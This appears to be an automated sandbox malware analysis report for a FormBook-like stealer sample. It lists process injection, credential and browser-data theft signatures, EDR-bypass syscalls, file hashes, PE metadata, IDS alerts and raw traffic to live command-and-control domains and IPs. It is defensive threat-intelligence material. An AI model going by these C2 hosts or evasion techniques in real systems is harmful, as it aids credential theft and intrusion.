                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                Behavior Graph ID: 1551048, Sample: SDBARVe3d3.exe, Startdate: 07/11/2024, Architecture: WINDOWS, Score: 100

                Signatures on the sample: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures
                DNS/IP: www.tesetturhanzade.xyz (signature: Performs DNS queries to domains with low reputation); zz67x.top; 23 other IPs or domains

                Process tree:
                • SDBARVe3d3.exe 3 (started)
                  dropped: C:\Users\user\AppData\...\SDBARVe3d3.exe.log, ASCII
                  signature: Injects a PE file into a foreign processes
                  • SDBARVe3d3.exe (started)
                    signature: Maps a DLL or memory area into another process
                    • wPGxKDFwovcH.exe (injected)
                      signature: Found direct / indirect Syscall (likely to bypass EDR)
                      • fc.exe 13 (started)
                        signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                        • wPGxKDFwovcH.exe (injected)
                          signature: Found direct / indirect Syscall (likely to bypass EDR)
                          DNS/IP: ultrawin23.shop 170.39.213.43, 49963, 49978, 49994 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY Reserved; papampalli.shop 162.241.85.94, 50036, 50037, 50038 OIS1US United States; 10 other IPs or domains
                        • firefox.exe (started)

                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | SDBARVe3d3.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos | |
                | SDBARVe3d3.exe | 100% | Avira | TR/AD.Nekark.kgpom | |
                | SDBARVe3d3.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                unknown
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pafc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1551048
Start date and time: 2024-11-07 12:51:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SDBARVe3d3.exe
renamed because original name is a hash value
Original Sample Name: 15f617e02521dc3ca65cdc5442d2e5d079a4bbf70d64b465b903d28fcda44103.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/12
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 75%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 90%
                                                                                                                                  • Number of executed functions: 93
                                                                                                                                  • Number of non-executed functions: 277
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                  • VT rate limit hit for: SDBARVe3d3.exe
Time      Type             Description
06:52:01  API Interceptor  2x Sleep call for process: SDBARVe3d3.exe modified
06:53:16  API Interceptor  9381821x Sleep call for process: fc.exe modified
                                                                                                                                  https://sendspace.com/pro/z42su8Get hashmaliciousMamba2FABrowse
                                                                                                                                  • 18.245.31.5
                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                  • 3.170.115.57
                                                                                                                                  assailant.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                  • 54.171.230.55
                                                                                                                                  bin.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 34.210.146.241
                                                                                                                                  bin.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 54.230.74.218
                                                                                                                                  sora.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 63.34.86.27
                                                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.171.230.55
                                                                                                                                  https://worldpay.merchant-dispute.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.160.150.119
                                                                                                                                  sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 65.11.83.73
                                                                                                                                  HOSTNETNLDHL Express Doc 01143124.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  https://polidos.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 91.184.0.111
                                                                                                                                  CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  LOOPIASEhttp://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 194.9.94.86
                                                                                                                                  Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  proforma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  shipping documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  http://tok2np0cklt.top/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  docs_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  Process:C:\Users\user\Desktop\SDBARVe3d3.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1216
                                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                  Malicious:true
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                  Process:C:\Windows\SysWOW64\fc.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):114688
                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Entropy (8bit):7.9806492585011055
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                  File name:SDBARVe3d3.exe
                                                                                                                                  File size:678'400 bytes
                                                                                                                                  MD5:b6e0fb667376ccebddaf47c6d4432472
                                                                                                                                  SHA1:f596c7e6c1bf8af55b744ef512fdbaa44c75b876
                                                                                                                                  SHA256:15f617e02521dc3ca65cdc5442d2e5d079a4bbf70d64b465b903d28fcda44103
                                                                                                                                  SHA512:52789ef3fc7c83010b50af3e2db03c0e0ffbfa64e37709f72ab99ce583acf98cc5c15bf28e7ce6a95dcbb29df772752fb4e37be90d53c5ea6b47156b731b84d5
                                                                                                                                  SSDEEP:12288:O1RveBYT8JXCvb3oFtC37Fg1eRypHnobqCdA47IvDxmsVM3EULFayQpyBNsel:O1RWBY41CTI4+ssEovDUGCE6FayQpAN7
                                                                                                                                  TLSH:82E4238433D80E3DC83F4B7A7D751D801796883F055CEBAE7EA8556DB32976208E4E62
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....00...............0..N...........m... ........@.. ....................................@................................
                                                                                                                                  Icon Hash:90cececece8e8eb0
                                                                                                                                  Entrypoint:0x4a6d16
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x9A3030A7 [Fri Dec 22 09:17:27 2051 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                  Instruction
                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa6cc1          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa8000          0x628         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xaa000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xa5414          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xa4d1c       0xa4e00   6201b8c64a6da9d4754cb33ed5512aef  False     0.9850916887793784  data       7.986248350186217    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xa8000          0x628         0x800     018cf8030e498e7ab873aa4e12f8da75  False     0.33740234375       data       3.466914278526347    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xaa000          0xc           0x200     2f166bdbf531cce901689f1ce442f9b9  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xa8090  0x398  OpenPGP Public Key                                                                                    0.41630434782608694
RT_MANIFEST  0xa8438  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain

Timestamp                        SID      Signature                                                               Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-11-07T12:52:20.161258+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         20.12.23.50  443          192.168.2.4     49735      TCP
2024-11-07T12:52:59.013477+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         20.12.23.50  443          192.168.2.4     49741      TCP
2024-11-07T12:52:59.455958+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  49742        85.159.66.93    80         TCP
2024-11-07T12:53:23.159013+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  49856        91.184.0.200    80         TCP
2024-11-07T12:53:36.833853+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  49933        194.9.94.85     80         TCP
2024-11-07T12:53:50.577710+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50010        170.39.213.43   80         TCP
2024-11-07T12:54:04.125673+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50023        13.248.169.48   80         TCP
2024-11-07T12:54:18.690356+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50027        38.47.232.194   80         TCP
2024-11-07T12:54:32.265623+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50031        167.172.133.32  80         TCP
2024-11-07T12:54:45.843997+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50035        162.0.211.143   80         TCP
2024-11-07T12:55:07.834225+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50039        162.241.85.94   80         TCP
2024-11-07T12:55:21.250769+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50043        3.33.130.190    80         TCP
2024-11-07T12:55:34.666154+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50047        3.33.130.190    80         TCP
2024-11-07T12:55:48.345102+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50051        188.114.97.3    80         TCP
2024-11-07T12:56:01.747068+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5                                1         192.168.2.4  50055        3.33.130.190    80         TCP

Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                  Nov 7, 2024 12:53:31.750294924 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:31.750336885 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:31.870959044 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.871098995 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:32.424801111 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:33.443422079 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:33.448402882 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.448554039 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:33.459759951 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:33.466234922 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466247082 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466335058 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466345072 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466353893 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466361046 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466370106 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466468096 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466638088 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461174965 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461189985 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461204052 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461215973 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461226940 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461277008 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461281061 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:34.461313009 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:34.461313963 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461354017 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:34.461442947 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461487055 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:34.971582890 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:35.990400076 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:35.995429039 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:35.995593071 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.002794981 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.007766962 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833479881 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833610058 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833621025 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833668947 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833678961 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833692074 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833853006 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.833853006 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.954579115 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.954713106 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.955600023 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.960408926 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.317594051 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:42.323355913 CET8049963170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.323458910 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:42.334391117 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:42.339217901 CET8049963170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.925740957 CET8049963170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.927076101 CET8049963170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.927125931 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:43.846575975 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:44.865133047 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:44.870426893 CET8049978170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:44.870524883 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:44.881557941 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:44.886569977 CET8049978170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:45.465450048 CET8049978170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:45.466540098 CET8049978170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:45.466593981 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:46.393454075 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:47.412075043 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:47.417007923 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.417607069 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:47.428281069 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:47.433150053 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433167934 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433176994 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433185101 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433202028 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433209896 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433217049 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433265924 CET8049994170.39.213.43192.168.2.4
